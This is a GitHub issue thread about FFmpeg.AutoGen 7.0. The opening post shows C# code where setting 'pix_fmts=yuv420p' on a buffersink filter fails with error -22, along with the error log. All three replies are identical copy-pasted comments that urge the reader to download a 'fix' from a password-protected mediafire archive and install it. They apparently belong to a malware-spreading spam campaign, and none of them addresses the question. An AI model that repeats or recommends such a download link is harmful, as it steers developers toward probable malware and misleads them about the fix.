### ISSUE TITLE
Version 7.0 Can't set buffersink args

### ISSUE THREAD

**Issue by GodOMG** [Ruslan-B/FFmpeg.AutoGen.Questions#48]
```
        fixed (AVFilterContext** p_buffersink_ctx = &buffersinkCtx)
        {
            //pix_fmt=yuv420p:out_color_matrix=bt709:out_range=limited
            ret = ffmpeg.avfilter_graph_create_filter(p_buffersink_ctx, buffersink, "out", "pix_fmts=yuv420p", null, filterGraph);//This return -22
            //ret = ffmpeg.avfilter_graph_create_filter(p_buffersink_ctx, buffersink, "out", null, null, filterGraph);//This is ok
            if (ret < 0)
            {
                ffmpeg.av_log(null, ffmpeg.AV_LOG_ERROR, "Cannot create buffer sink");
                throw new Exception("Cannot create buffer sink");
            }
        }
```
log
```
[out @ 000002c6d14f8ec0] Error setting option pix_fmts to value yuv420p.
[out @ 000002c6d14f8ec0] Error applying generic filter options.
Cannot create buffer sink
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
